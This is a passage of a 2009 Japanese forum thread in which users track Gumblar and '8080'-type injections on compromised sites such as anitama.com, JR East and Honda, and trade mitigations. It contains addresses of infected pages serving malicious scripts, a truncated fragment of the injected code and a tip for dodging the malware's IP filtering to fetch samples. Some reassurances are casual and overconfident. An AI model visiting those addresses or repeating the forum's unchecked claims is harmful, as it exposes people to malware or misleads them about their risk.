本体はわからんけど攻撃スクリプトだけもらった
アドレス記入ってどういうこと?
直接ブラウザで見に行くのはやめといたほうがいいよ
404とかが返ってきたのならIP制限で拒否されたんじゃね

158:148
09/12/15 02:11:40
>>157
Virustotalのアップロード部分に、.phpのURLを入れてみた。
size0で、対応してくれなかったから、パソコン内のファイルじゃないとだめなのかと思って。
「攻撃スクリプトだけもらう」のがどういうことかわからないし、
今の自分には無理だということはわかった。
何度もありがとう。

名無しにもどります。

159:名無しさん@お腹いっぱい。
09/12/15 09:28:58
>>153
gumblarはphpでアクセス制御をしていて
同一ホストからの複数回のアクセスには404を返す。
aguseその他のゲートウェイ(つまりゲートウェイのIP)で
2回チェックするとそれ以降は無害判定になる。
(今は亡きソースチェッカーではproxyにチェック入れて引っかけていた)。
何度も何度も言ってるんだけど。

160:名無しさん@お腹いっぱい。
09/12/15 09:30:54
追記。1回踏んじゃった後であらためて検体を拾いたいのなら
モデムリセットしてIPを変えるかてきとーなproxyを刺すとかすればよろし。

161:名無しさん@お腹いっぱい。
09/12/15 19:43:23
声優個人の中村繪里子スレより。
ラジ関のアニラジサイトanitama.comがやられている模様

> 282 名無しさん@お腹いっぱい。 [sage] 2009/12/15(火) 17:48:43 ID:TnBI7JUt0 Be:
> ありがとう、その辺が妥当かな?
> ちと聞いてみる。
>
> とはいえ、xnxx-com.nu.nl.w3-org.goldgolfbag.ruなんてドメイン使うってことないよね?

> 283 名無しさん@お腹いっぱい。 [sage] 2009/12/15(火) 17:56:33 ID:7Tpx8wr40 Be:
> よくわからんけどキャッシュの方のソース見ると最後の一行が入ってないね

> 299 名無しさん@お腹いっぱい。 [sage] 2009/12/15(火) 18:50:45 ID:zA943d8b0 Be:
> anitama.comのページ全部やられているような気がする。

> 300 名無しさん@お腹いっぱい。 [sage] 2009/12/15(火) 18:52:16 ID:TnBI7JUt0 Be:
> >>297
> Adobe Readerを更新してなかったスタッフがいたんじゃないかなぁ。
> Javaと一緒にChangeLog.pdfってのも読み込ませようとしてたから、まず
> その辺かなという気がするよ。

スレリンク(voiceactor板)

162:名無しさん@お腹いっぱい。
09/12/15 19:45:47
先に書き込みありましね、勝手ながら注意喚起のため緊急浮上でage

163:名無しさん@お腹いっぱい。
09/12/15 20:33:54
中村繪里子スレの住人です。

インターネットラジオのページだけは大丈夫のようです。
各ページからは直接リンクではなく、javascriptで別ウィンドウを開く作りなのが功を奏したか。
もし番組を聞かれる方は直接飛んだ方がいいかと。URLリンク(anitama.com)

164:名無しさん@お腹いっぱい。
09/12/15 21:11:02
アニやまのHPにアクセスしたらおかしくなった…
アンチウイルスソフトいれてないんだけどヤバイですか?

165:名無しさん@お腹いっぱい。
09/12/15 21:38:08
Adobe Readerつかうより
Foxit Readerの方が安全と言えるだろうか

166:名無しさん@お腹いっぱい。
09/12/15 21:46:15
>164
>1の「更新」関係で抜けがあったらご愁傷さま

167:名無しさん@お腹いっぱい。
09/12/15 21:59:00
>>165
FoxitReaderにも似たような脆弱性なかったっけ
勘違いならスマソ

168:名無しさん@お腹いっぱい。
09/12/15 22:07:43
SecuniaがAdobe Reader危ないとうるさい

169:名無しさん@お腹いっぱい。
09/12/15 22:10:21
>>165
個人的には気休め程度には安全かと
Adobe Readerと同じ脆弱性が他のPDF Viewerにないとは言い切れないから
それより利便性は落ちるが、プラグインは切ってブラウザに連動させて見たりせずに
ダウンロードしてから見るようにしたほうが安全な気がする

あとゼロデイの脆弱性がAdobe Reader 9.2以下で発生している模様
詳細が不明なので対策しにくいが・・・
URLリンク(blogs.adobe.com)

170:名無しさん@お腹いっぱい。
09/12/15 22:42:53
このウイルスって、同一LAN上のPCは感染しますか?
アニ●マをネットブック(Puppy Linux4.3.1-jp SeaMonkey 1.1.18)で表示していて(ネトラジを聴いていて)、
他の作業を同一LAN上の他のPC(WinXP 一応>>1の対応は済)でやっていたのですが。
念のためネットブックは隔離、様子見中。

171:名無しさん@お腹いっぱい。
09/12/15 22:49:39
…めちゃくちゃおもたくなってきた。
まうすかーそるも長ゆっくりしか動かない


172:名無しさん@お腹いっぱい。
09/12/15 22:52:48
アニオタがダイ終結してるのか
とりあえず再インストールして
>1の更新関連をしておけ



173:名無しさん@お腹いっぱい。
09/12/15 22:57:58
>>170
Linuxでは感染しないので同一LAN上にWindowsがあっても大丈夫
またLAN上で動作するようなことは確認されていない
アップデートで対策をしているなら安心していい

174:170
09/12/15 23:03:14
>>173
レスとんくす。
安心しました。Linuxでは感染しないのですね。
ほっとしました。
ちなみに>>171は自分ではありません。

175:名無しさん@お腹いっぱい。
09/12/15 23:38:19
>>169
JavaScript切ればとりあえず回避できるとかあった

Adobe 0-day in the wild - again
URLリンク(isc.sans.org)


176:名無しさん@お腹いっぱい。
09/12/15 23:45:43
>>175

このスレの住民ならAcrobat Javascriptは切ってるだろうから問題ないな

177:名無しさん@お腹いっぱい。
09/12/15 23:50:30
>>158
> Virustotalのアップロード部分に、.phpのURLを入れてみた。
これは無理

> パソコン内のファイルじゃないとだめなのかと思って。
そういうことです
アップロードしたファイルを確認できるのはそのファイルを持っている人だけ
VirusTotalからDLは不可能
DLできちゃったら危ないからね

178:名無しさん@お腹いっぱい。
09/12/16 00:59:43
ところでアニたまのウイルスは本当にGumblar系か?
似てはいるがスクリプトの挿入位置や内容が違うような
いままで <script>/*GNU GPL*/ こんなのなかったしカスペで反応しない・・・
あるいは新型のスクリプトなのか

結果: 0/41
URLリンク(www.virustotal.com)

179:名無しさん@お腹いっぱい。
09/12/16 01:04:21
糞ジャンクショップ GENO 閉店…店舗販売を終了しWeb販売のみに
スレリンク(news板)

やっぱ例の事件の影響があったのかな?

180:名無しさん@お腹いっぱい。
09/12/16 01:59:40
>>178
本体じゃないから反応しないだろ
ノートンで行くと反応した

181:名無しさん@お腹いっぱい。
09/12/16 02:32:41
>>180
なるほど本体バイナリは同じか
スクリプトが大きく変わったんだな

182:名無しさん@お腹いっぱい。
09/12/16 07:29:19
>>161-163
これはいわゆる8080系イジェクションで、gumblar(geno)じゃないよ。
使う脆弱性はおなじみFlashやAcrobatなので対策は同じ。


183:名無しさん@お腹いっぱい。
09/12/16 07:37:20
>>176
ついでに。
URLリンク(www.shadowserver.org)
Right now only 5 out of the 41 different Antivirus vendors used by Virustotal are detecting this threat.
Even then their detection appears to be generic and is not currently specifically detecting this exploit.
The 5 vendors to detect the threat are:
(McAfee-GW-Edition) *note this is not the same as McAfee Desktop or Mail Server Edition
(eSafe)
(NOD32)
(AntiVir)
(Kaspersky)

補足するとMcAfeeのGWは旧Webwasherで、McAfee+何かという構成で
VirusTotalのはMcAfee+AnviVir。実質4ベンダー。
eSafeがKasperskyオプション付きなら実質3ベンダー。

184:名無しさん@お腹いっぱい。
09/12/16 07:43:24
ほい、anitamaの初段スクリプト。
URLリンク(www.virustotal.com)

185:名無しさん@お腹いっぱい。
09/12/16 07:45:16
アニたまスレにもレスしたけど、こっちにも
いつもGumblar追っかけてくれてる人が検証してくれてた

「アニたまどっとコム」のサイトが改ざん被害。さまざまな脆弱性を突く処理が・・・
URLリンク(blogs.yahoo.co.jp)

上にもあるようにGumblarではないけど、Gumblarよりもタチ悪いかもな
ってことでこれ以上はここではスレチか

186:名無しさん@お腹いっぱい。
09/12/16 07:48:36
>>184
さっき誤ってアニたまに飛ぼうとしてカスペ先生が遮断してくれたとこだぜw
まあ砂箱内のブラウザで、js切った状態だったから飛んでも問題なかっただろうが

187:名無しさん@お腹いっぱい。
09/12/16 08:06:07
いちおanitamaのスクリプトは各社に提出済みです。
バスターはトレンドマイクソの鯖がおかしいんで送れてないけど。

188:名無しさん@お腹いっぱい。
09/12/16 09:49:45
>>185
スレチではあるが同じ脆弱性も突いているウイルスだから
ここでもアリのような気もする・・・ウイルス総合スレなんてないしな

189:名無しさん@お腹いっぱい。
09/12/16 11:46:30
アニヲタ撲滅運動か??

190:名無しさん@お腹いっぱい。
09/12/16 13:50:31
>184
今はカスペだけか、恐いな

191:名無しさん@お腹いっぱい。
09/12/16 13:56:07
検出の仕方にもよるからカスペだけとは限らない
現にノートンでも検出する

192:名無しさん@お腹いっぱい。
09/12/16 14:48:27
アンラボ?とかいうので駆除してみたんでもう大丈夫ですかね??

193:名無しさん@お腹いっぱい。
09/12/16 20:20:31
>>188
ページ改竄の総合情報スレ的なものってないのかな?

ちなみにアニたまは公式アナウンス来た
一応あのスクリプトは取り除いたみたいだが、まだ調査中の模様
完全に安全になりました、とは言えないな・・・

194:名無しさん@お腹いっぱい。
09/12/16 22:03:13
>>189
むしろ頑張れって感じだなw

195:名無しさん@お腹いっぱい。
09/12/16 22:44:44
>>193
アニたまに関しては、今のところスレチだ他でやれ的なレスも
ないようだからここでやってもよさそうだ

しかし、ページ改竄の被害が身近になってくると
総合情報スレ的なものが欲しくなるな
新しく立てても過疎りそうだから個人的には
次スレはこれを考慮に入れたスレにしたいものだが

196:名無しさん@お腹いっぱい。
09/12/16 22:49:57
スレチだ他でやれ

197:名無しさん@お腹いっぱい。
09/12/16 23:31:08
ああいうとやっぱりこういうレスがつくよなw

198:名無しさん@お腹いっぱい。
09/12/16 23:37:07
アニたまのは音楽ファイル自体は大丈夫なのかのう。

199:名無しさん@お腹いっぱい。
09/12/17 00:16:09
>195
アニたまはいい加減スレチとして、確かに>193の「インジェクション総合スレ」っぽいのは見たい
欲張って「マルウェア・ウイルス総合スレ」にしちゃうと、分量・速度的にキリが無さそうだしな

200:名無しさん@お腹いっぱい。
09/12/17 00:23:39
ブラウジングウイルス対策総合スレ

201:名無しさん@お腹いっぱい。
09/12/17 00:28:39
>>199
たしかに欲張ると質問が押し寄せて収拾つかなくなりそうだ
ただ、範囲を絞りすぎると過疎が怖いしな・・・
検索で見つけやすいスレタイやテンプレの問題もあるが

202:名無しさん@お腹いっぱい。
09/12/17 00:47:06
【Gumblar】Webウイルス対策総合スレ【8080】

203:名無しさん@お腹いっぱい。
09/12/17 01:03:34
【Gumblar/GENO】Web改竄ウイルス総合スレ【8080】

ではどう? GENOと改竄を入れた方が分かり易いと思う。

204:名無しさん@お腹いっぱい。
09/12/17 01:11:09
なんか建てるならブラウザ戦争おこさないようにテンプラ気をつけろ

205:名無しさん@お腹いっぱい。
09/12/17 02:06:07
ここ来る連中にちょろいやつはいないだろうからもうここイラネ

206:名無しさん@お腹いっぱい。
09/12/17 02:35:09
【Gumblar/GENO】Web改竄ウイルス情報総合スレ【8080】

ちょっと長いけどこれでどうだ?
情報って言葉を入れることであくまでも第一報やそれに準じる大まかな情報のみ扱う
で、被害が大きかったり細かい対策で情報量が増えていくようだったら
そのウイルスごとに別スレを立てて誘導していくって感じ





207:名無しさん@お腹いっぱい。
09/12/17 03:25:11
内容はこんな感じでどうだろ?
一応このスレの改変してテンプレも作っているが
自分も詳しいわけではないのでアップデート対策と
Gumblarについてしかまとめていない

改ざんされたWebページを経由して感染するウイルスの情報・対策スレです

ウイルス情報・対策方法・脆弱性情報などをお願いします
被害が増加しているようなら別スレを立てて誘導してください

現時点でGumblar(GENO)、8080、JustExploitなどのインジェクションが流行しています
基本的な対策としてセキュリティ・アップデートを欠かさないようにしましょう

*** 感染した場合はクリーンインストールと安全なPCからのパスワードの変更を推奨します ***



あとブラウザについてだが

■ ブラウザでJavascriptの使用を基本無効に設定
・Internet Explorer ツール → インターネット オプション →
 → セキュリティ・タブ → このゾーンのセキュリティのレベルを「高」に
・Firefox NoScriptを導入する
・Google Chrome -disable-javascriptで起動。
・Opera ツール → クイック設定 → 「JavaScriptを有効にする」のチェックを外す

こうしているが他にいい案はないかな

208:名無しさん@お腹いっぱい。
09/12/17 05:11:13
>>207
だからそういう風に書くから粘着馬鹿につけ込まれるんだって。
個人的にはブラウザ関連の記述はあえてテンプレからは外すようにした方がいいと思うけど
どうしても入れたいなら

■ ブラウザでJavascriptの使用を基本無効に設定
・Internet Explorer ツール → インターネット オプション →
 → セキュリティ・タブ → このゾーンのセキュリティのレベルを「高」に
・Firefox ツール→オプション→コンテンツ→ 「JavaScriptを有効にする」のチェックを外す
・Google Chrome -disable-javascriptで起動。
・Opera ツール → クイック設定 → 「JavaScriptを有効にする」のチェックを外す

とした方がいい。

209:名無しさん@お腹いっぱい。
09/12/17 06:52:58
なんでわざわざIE厨の機嫌取らないといけないんだよ


210:名無しさん@お腹いっぱい。
09/12/17 07:01:48
まあでもJavaScriptの無効方法のテンプレなのに、NoScriptが対処方法ってのはおかしいな
ブラウザ単体で切ること自体はできるんだから

211:名無しさん@お腹いっぱい。
09/12/17 07:09:53
なんでわざわざ火狐厨の機嫌取らないといけないんだよ

212:名無しさん@お腹いっぱい。
09/12/17 08:15:43
こういうのがいるからだろ

213:名無しさん@お腹いっぱい。
09/12/17 08:49:54
IEでも火狐でも、どーでもいいわい

214:名無しさん@お腹いっぱい。
09/12/17 10:27:53
>>208-213

・WebブラウザのJAVAScriptを切っておく
※切り方はググれカス(勝手に調べて下さい)

これでどないだ?(苦笑)

215:名無しさん@お腹いっぱい。
09/12/17 11:41:20
共通の敵がいるのになんで内紛せにゃならんのだ

216:207
09/12/17 12:21:34
ご意見どうも
ブラウザに関しては利便性の問題もあるので
応用的なことは外すほうがいいか
あまり代わり映えしないが扱う範囲が広くなるからよしとして
アップデートとGumblarくらいのシンプルなものにするかね
あとは誰か詳しい人が追加してくれるだろうし

それと
・QuickTime・RealPlayer等の更新
・VirusTotal・VirSCAN.org
・サイトチェッカー
・オンラインスキャン

このあたりは入れていないがいいかな?
とりあえず立てるにしてもいろいろ意見は欲しいところ

217:名無しさん@お腹いっぱい。
09/12/18 11:46:37
>>700
その共有ボタンに登録した情報から動向を探るのが本当の目的だろ
いつもの収集作業だな

218:名無しさん@お腹いっぱい。
09/12/18 11:49:01
ごばったけど過疎ってるしまぁいいか…

219:名無しさん@お腹いっぱい。
09/12/18 12:23:30
過疎ってないよ

220:名無しさん@お腹いっぱい。
09/12/18 12:26:32
動きがないと過疎るからなあ
総合スレは次になにかあったときのほうがいいかもな・・・

221:名無しさん@お腹いっぱい。
09/12/19 03:57:44
水面下で着々と怠惰な情弱共が喰われていってるくらいだな
事前に最低限の対策をしていれば当面の間は問題ない

222:名無しさん@お腹いっぱい。
09/12/19 12:12:49
今GENOサイトがメンテナンス中なんだが、
また何かあったのか?と疑ってしまう・・・

223:名無しさん@お腹いっぱい。
09/12/19 18:24:13
メンテナンスはメンテナンスですしおすし

224:名無しさん@お腹いっぱい。
09/12/20 21:35:28
よく分からんが、恐らく感染してるっぽいが、userフォルダをusbメモリに退避して、osクリーンインストールでおk?

225:名無しさん@お腹いっぱい。
09/12/20 22:02:39
その退避したファイルが~ってオチですね

226:名無しさん@お腹いっぱい。
09/12/21 01:04:28
USBメモリが別のにやられてそうだよね

227:名無しさん@お腹いっぱい。
09/12/21 04:40:41
HijackThisのログで拾ってくれないかな?
感染した人、試してみて

228:名無しさん@お腹いっぱい。
09/12/21 05:50:49
>>227
VirtualBox上で感染させたちょっと古いやつだけど、HijackThisのログでは拾えなかった

229:名無しさん@お腹いっぱい。
09/12/21 21:35:55
thx
やっぱり駄目か・・

230:名無しさん@お腹いっぱい。
09/12/21 23:52:31
つかワクチンで対処ができないとかjavaって欠陥ソフトやん、どうにかしろや

231:名無しさん@お腹いっぱい。
09/12/22 09:22:26
ワクチンとかアンチウイルスとかが既に幻想
UACも、ウイルス系の8割が突破、通常アプリの8割がブロック

自分の責任じゃないとか言ってるうちにWindows滅びますぜ ゲイツさんよ


232:名無しさん@お腹いっぱい。
09/12/22 12:05:42
>231
MSEを無料で作る程度には、責任感じてる気もする
肝心のMSEの性能はシラネ

233:名無しさん@お腹いっぱい。
09/12/22 13:46:02
MSEやその前身のOneCareもどこかよその企業をいくつか買収しただけだったりする。

234:名無しさん@お腹いっぱい。
09/12/22 23:37:25
ソープ板から すまんこ。
アニたま系と同じやつだとおもうのだけど(ソープ店HP)
//santafe.santafe-group.com/index.html 内の最後の方のアクセス解析スクリプト
//santafe.santafe-group.com/acc/xenoLogger.js
が乗っ取られてるみたいで ロシアにご案内されてしまう。

地味に被害が広がっていて、管理者側も依然手を打ってない模様。

専用スレでも立ててage放しにして警告しといたほうがいいのかな?
3行ほどでアドバイスいただけないかしら。

235:名無しさん@お腹いっぱい。
09/12/22 23:38:45
>>231
ゲイツは08年6月27日に退職しとるがな

236:名無しさん@お腹いっぱい。
09/12/22 23:56:55
>>234
Gumblarじゃない
--
document.write(acCODE); /*GNU GPL*/ try{window.onload = function(){var 以下略
--
参照
URLリンク(www.so-net.ne.jp)


237:名無しさん@お腹いっぱい。
09/12/23 02:51:35
>231
OS・アプリ・Flashの更新関係は全部チェック、ブラウザも極力最新版を
無料でもセキュソフトは必須、未対策は感染を広げる(偽セキュソフトに注意)
不安ならブラウザとPDFソフトのJavascriptはOFF、後者は常時OFFでもいい

ほい、3行
できる・やるべき対策はGumblarと同じ

238:名無しさん@お腹いっぱい。
09/12/23 02:53:02
>237は>234宛だった

239:名無しさん@お腹いっぱい。
09/12/23 04:04:08
言ってることは正しいんだが、安価ぐらいちゃんと打とうよ・・・

しかしGNU GPLで始まるスクリプトのインジェクション、じわじわと拡がってるみたいね
もう1個ぐらい有名サイトが陥落でもしたら、総合スレ立てても良いような

240:234
09/12/23 04:41:13
>>236-239
色々ありがとう。
メディアでの記事も参考になったし、Adobe Readerでjavaスクリプトとかあるの知らなかった。

最後にもうひとつだけ質問させて。
コレって、サーバーに侵入されて書き換えられてるの?
それとも、保守用のPCが何らかの感染しているの?

241:名無しさん@お腹いっぱい。
09/12/23 05:13:34
両方あり得るし、それは管理者じゃないとわからん。

242:名無しさん@お腹いっぱい。
09/12/23 07:41:40
管理者のPCが感染
→鯖の管理アカウントが漏洩
 →鯖に仕掛けられる
   →それを見た別の管理者のPCが感染
の永久ループだろ

ちなみに、adobe readerは全バージョンセキュリティホール放置中、対策版は恐らく来月中旬
攻撃コードの作り方が簡単過ぎて笑ったので、年末年始に流行りそうな予感


243:名無しさん@お腹いっぱい。
09/12/23 08:11:44
年末年始を狙ってくるのは確実だろうなあ
んで改ざんされたサイトの管理人が休暇中で、ウイルスばらまいた状態になったままとかorz

ところでJR東日本の公式サイトが改ざんされたとかでサービス停止してる
URLリンク(www.mbs.jp)

244:名無しさん@お腹いっぱい。
09/12/23 08:15:17
URLリンク(sorry.jreast.co.jp)
JR東もやられたっぽい。
只今メンテ中。

245:234
09/12/23 09:14:51
>>241,242
ありがとう。>>239さんの通りじわじわ拡大してるようですね。
件の管理者も早く気付いて欲しいところです。

246:名無しさん@お腹いっぱい。
09/12/23 13:16:32
管理者自身、geno技術がすごすぎて手が打てないんだろ

247:名無しさん@お腹いっぱい。
09/12/23 13:26:21
JR東のサイト内検索窓に改ざん 運用停止
URLリンク(www.fnn-news.com)
社内で調査したところ、外部からの不正なアクセスがあったほか
改ざんされた画面などにアクセスした場合、ウイルスに感染するおそれもあるという。


248:名無しさん@お腹いっぱい。
09/12/23 13:35:31
この際、javaやめてnet frameでええよ

249:名無しさん@お腹いっぱい。
09/12/23 15:15:27
Gumblar撤退?
URLリンク(blogs.yahoo.co.jp)
--
asianmotors●co●in ←危険
ここって、インジェクションの実験場に使われてる?
*GNU GPL*に酷似した(同じ?)
<script>/*CODE1*/ try{window.onload = function(){var
こんなのが転がってるんだが・・・
※Gumblarは残ったまま

250:名無しさん@お腹いっぱい。
09/12/23 15:36:53
ここも凄い事になってるなw
URLリンク(www)●cafekamrans●co●uk/


251:名無しさん@お腹いっぱい。
09/12/23 17:03:10
>>249-250
どんな感じなんだ
一回見てみたいんだがチキンだから見れない画像うpしてください^q^

252:名無しさん@お腹いっぱい。
09/12/23 19:13:18
Firefoxで頭にview-source:付ければいいだろ

253:名無しさん@お腹いっぱい。
09/12/23 19:19:58
>>249
code1は8080系だね。前はGNU GPLとか書いてた奴。

254:名無しさん@お腹いっぱい。
09/12/23 19:20:48
上げてください^q^

255:名無しさん@お腹いっぱい。
09/12/23 20:03:53
自分で見れないレベルなら見てもわからんと思うよ

256:名無しさん@お腹いっぱい。
09/12/23 20:36:48
>>251
249と250もチキンだからな

257:名無しさん@お腹いっぱい。
09/12/24 00:08:42
JR東日本のサイト改ざんはGamblar亜種
URLリンク(www.jreast.co.jp)

不正アクセスにより改ざんされたページ及び期間
JR東日本ホームページ内キーワード検索
2009年12月8日(火)21:40~12月21日(月)23:55
大人の休日倶楽部内の東京講座ページ
2009年12月18日(金)11:00~12月22日(火)21:00

258:名無しさん@お腹いっぱい。
09/12/24 00:10:22
久々に見にきてみれば、JRもGENOか

259:名無しさん@お腹いっぱい。
09/12/24 00:14:58
検索だけじゃなかったのか

260:名無しさん@お腹いっぱい。
09/12/24 00:15:32
>>256
よう、腰抜けw

261:名無しさん@お腹いっぱい。
09/12/24 00:15:40
スペル覚えにくいけどGumblarね

262:名無しさん@お腹いっぱい。
09/12/24 00:21:57
>>261
Gumblarなのね、覚えた

263:名無しさん@お腹いっぱい。
09/12/24 00:45:10
>>256
ほっといたらいい
URLしか貼り付けれない奴らだから

264:名無しさん@お腹いっぱい。
09/12/24 01:12:37
GENO怖くて4月からもうずっと専ブラで2chとふたば見るだけのネット生活だ…

265:名無しさん@お腹いっぱい。
09/12/24 01:59:27
【GENO出世】JR東のサイトにアクセスしたユーザーにGENOウイルス感染の恐れ
スレリンク(news板)

266:名無しさん@お腹いっぱい。
09/12/24 02:11:52
GENOウイルススレ 23
スレリンク(sec板)

267:名無しさん@お腹いっぱい。
09/12/24 02:12:34
>>266
誤爆したスマソ

268:名無しさん@お腹いっぱい。
09/12/24 05:34:59
ここまでGENOで定着してしまうとはね・・・アメリカの企業だったら名誉毀損で訴訟起こすレベルw
そりゃインジェクションされたGENO側が悪いのも分かるけどさ・・・
JRが真っ先にやられてたらJRウイルスとでも言われてたのだろうか?

269:名無しさん@お腹いっぱい。
09/12/24 06:23:31
>>261

「ガンバレー」に見えてしまう

270:名無しさん@お腹いっぱい。
09/12/24 10:32:08
ガンプラに見えてしまわない

271:名無しさん@お腹いっぱい。
09/12/24 11:27:12
機動戦士Gumblar

272:名無しさん@お腹いっぱい。
09/12/24 12:07:08
vistaでDaonol感染した。
UAC切ってたからだと思う。
7のインストールディスクのコマンドプロンプト使ったが、midi9がないので、更なる亜種みたいだわ。
復元ポイントに戻ればいいみたいだが、生憎vistaのインストールディスクがなくてなおしようがない…

273:名無しさん@お腹いっぱい。
09/12/24 12:32:33
>>272
Vistaで応用できるか分からんが、KNOPPIXから修復する方法がある
URLリンク(pctrouble.lessismore.cc)

274:名無しさん@お腹いっぱい。
09/12/24 19:41:07
JR東日本のサイト改ざん、Gumblarの亜種は間違いで/*GNU GPL*/らしいな
Gumblarが撤退をしているようだから、これから8080系が流行るのか・・・
URLリンク(www.st.ryukoku.ac.jp)

275:名無しさん@お腹いっぱい。
09/12/24 19:47:30
8080系って電車みたいだな

276:名無しさん@お腹いっぱい。
09/12/24 20:16:13
>>272
midi9見えてないだけかもよ

277:名無しさん@お腹いっぱい。
09/12/24 20:16:56
>>268
GENOは対応の仕方がまずすぎたな

278:名無しさん@お腹いっぱい。
09/12/24 22:57:28
>>273
ありがとう、試してみる。

>>276
ん~、削除しようとしても見つからないって言われるし、展開してみても見つからないんで、とりあえず>>273が教えてくれたのを試してみる。

279:名無しさん@お腹いっぱい。
09/12/24 23:16:39
今度はJREか…

280:名無しさん@お腹いっぱい。
09/12/25 00:33:55
>279
3秒くらい、JR東日本とJavaランタイムのどっちか混乱した

281:名無しさん@お腹いっぱい。
09/12/25 03:33:03
今度の8080系がアニたまウイルスと命名されないか、心配だぜ
なんかso-netの記事見てると、分かりやすくするためだろうがやけにアニたまって言葉使ってて・・・

282:名無しさん@お腹いっぱい。
09/12/25 03:39:52
ここで命名しない限りそれは無い

283:名無しさん@お腹いっぱい。
09/12/25 07:17:10
ちゃんと閉鎖・発表してるのに命名されるのは可哀想だ


284:名無しさん@お腹いっぱい。
09/12/25 21:58:27
/*GNU GPL*/や/*CODE1*/などの8080系でAdobe Reader 9.2(最新版)の
脆弱性を突いたPDFファイルが落ちてくるようになった模様

対策は >>1 の「Acrobat JavaScriptをオフ」にすること

新手の正規サイト改ざんでAdobe Readerのゼロデイ攻撃~今すぐ対策を
URLリンク(www.so-net.ne.jp)

285:名無しさん@お腹いっぱい。
09/12/26 10:10:59
ついにきたか
さてと、どうすっかなぁ

年末年始休暇の間に職場の全PC設定は勘弁してほしいな



286:名無しさん@お腹いっぱい。
09/12/26 11:28:37
Adobeの次はJava。GENOウイルスの第二波が来るぞー(^o^)ノ
スレリンク(news板)

287:名無しさん@お腹いっぱい。
09/12/26 11:43:36
URLリンク(www.google.co.jp)

288:名無しさん@お腹いっぱい。
09/12/26 14:20:56
AdobeReaderの設定ってユーザーごとなのね。めんどくさ。
例 AcrobatJavaScriptの設定
HKCU\Software\Adobe\Acrobat Reader\9.0\JSPrefs
bEnableJS
(HKLMには無い)
ドメイン環境下ならポリシーでばら撒けばいいのか?

289:名無しさん@お腹いっぱい。
09/12/26 14:53:39
>>288
無いなら無いでHKLMにキーを作ってしまえばいいのでは?
Adobe Readerの設定の方からは有効無効を切り替えられなくなるだろうけど。

290:名無しさん@お腹いっぱい。
09/12/26 17:09:20
無駄な情報だったらゴメンこ
現在pixiv一般デイリー3位の人のサイト、踏むとウイルス検知されるみたいなので行かないように
他板のスレでGENOチェッカーで反応したというレスあったので一応念のため

291:名無しさん@お腹いっぱい。
09/12/26 17:13:36
GENOチェッカーとか未だに信じてる奴がいるなんて…

292:名無しさん@お腹いっぱい。
09/12/26 17:21:15
>>291
ああ、ずっとスレ見てなかったからそういうの知らんわスマンね

293:名無しさん@お腹いっぱい。
09/12/26 17:22:16
GENOチェッカーはともかく
/*GNU GPL*/に感染してるな・・・
avast!のWebシールドも反応する

294:名無しさん@お腹いっぱい。
09/12/26 17:49:50
>>289
確かにHKCUからbEnableJSを削除してHKLMに作成した場合は
HKLMを見てくれるようだ。
でもHKCUとHKLMの両方にあって設定が異なる場合は
HKCUのが優先されるからやっぱりだめだ。

www.openspc2.org/reibun/Acrobat9/javascript/app/001/sample/sample.pdf
で動作確認。

295:名無しさん@お腹いっぱい。
09/12/26 20:06:50
Adobe9.2の脆弱性って8や7には関係ないの?

296:名無しさん@お腹いっぱい。
09/12/26 20:11:45
ほれ
URLリンク(www.jpcert.or.jp)

297:名無しさん@お腹いっぱい。
09/12/26 20:59:44
>>297
ありがとう。7は平気なのかな

298:名無しさん@お腹いっぱい。
09/12/26 21:32:50
だめじゃね? 1年以上前にサポート終了してるから特に書いてないだけで。

299:名無しさん@お腹いっぱい。
09/12/26 21:58:12
もしサポート切れてる7使ってたら、その時点で今回の脆弱性云々の問題じゃないだろうねw

300:名無しさん@お腹いっぱい。
09/12/26 23:39:22
>>293
ついこの間、やんちゃにはっちゃけ暴走かましてくれた
avast!って正気に戻ったの?

301:名無しさん@お腹いっぱい。
09/12/27 00:07:47
>>300
いつの話だよ…。大きな誤検知騒ぎは速攻で修正されるわ。
ノートンだろうと何だろうと。

302:名無しさん@お腹いっぱい。
09/12/27 00:44:42
速攻じゃなかったろw

303:名無しさん@お腹いっぱい。
09/12/27 00:50:59
>>301

304:名無しさん@お腹いっぱい。
09/12/27 01:22:50
ホンダのHPがGENOウィルスに感染
スレリンク(news板)

305:名無しさん@お腹いっぱい。
09/12/27 01:34:15
>>304
うわ~ついに車関係も。

306:名無しさん@お腹いっぱい。
09/12/27 01:50:01
>>304
↓ここをGoogleのキャッシュで見ると/*GNU GPL*/の記述があるな
URLリンク(www)●honda●co●jp/STREAM/safety/

そろそろ総合スレ立てたほうがいいかね?

307:名無しさん@お腹いっぱい。
09/12/27 01:54:37
GENOじゃねえだろ

308:306
09/12/27 02:12:09
JR東日本と同じで8080系と区別がつかんのだろう

309:名無しさん@お腹いっぱい。
09/12/27 02:17:06
GENOにかかったっぽいのですが
システムの復元でかかる以前の状態に戻せば
クリーンインストールせずに済むのでしょうか?

310:名無しさん@お腹いっぱい。
09/12/27 02:25:54
>>309
このスレはクリーンインストール推奨
できれば安全なPCからパスワードも
変えたほうがいいくらい
自己責任でどうぞ

最近は8080系のほうが流行っているから
本当にGumblarかも分からないし

311:名無しさん@お腹いっぱい。
09/12/27 02:29:44
>>310
そうですか・・・
クリーンインストールをするということはCもDも
プログラムもファイルも全て消えて
PCを買った時の状態に戻るという認識でおkですか?

312:名無しさん@お腹いっぱい。
09/12/27 02:40:50
>>311
メーカー・パソコンのリカバリならそうなるかも
残せるかどうかはマニュアルをよく読むしかない
どちらにしても重要なデータはクリーンインストール前に
USBメモリなどにバックアップしておくのがいい

313:名無しさん@お腹いっぱい。
09/12/27 02:49:02
>>312
明日DVD-ROMでも買って大事なデータをバックアップ後クリーンインストールしてみます。
ありがとうございました。

あ、そのバックアップからまた感染という事態も起こりうるんでしょうか・・・?

314:名無しさん@お腹いっぱい。
09/12/27 02:56:37
>>313
ない、とはいいきれないが、実行ファイルでもない限り大丈夫だと思う
まあ念のため安全な環境から、バックアップデータをウイルススキャンするのもいいかも

315:名無しさん@お腹いっぱい。
09/12/27 03:00:29
>>314
ありがとうございます。
消すのに惜しいプログラムも多少ありますので・・・
明日おっしゃるとおりにやってみます。


316:名無しさん@お腹いっぱい。
09/12/27 03:13:45
Gumblarが戦略的撤退中で8080系が活発に活動。それもゼロデイ突いてくるというおまけ付き

そろそろ総合スレの時期が来たか
スレタイ>>206辺りで良いんじゃないかと個人的には思うけど、GENOって文字含むかどうか難しいなぁ・・・
後テンプレで無駄な論争になるのもなんだかなぁ・・・

317:名無しさん@お腹いっぱい。
09/12/27 03:16:42
8080なんかで検索しねえだろ
そんな名前で呼ぶやつなんて一人くらいだろうし

318:名無しさん@お腹いっぱい。
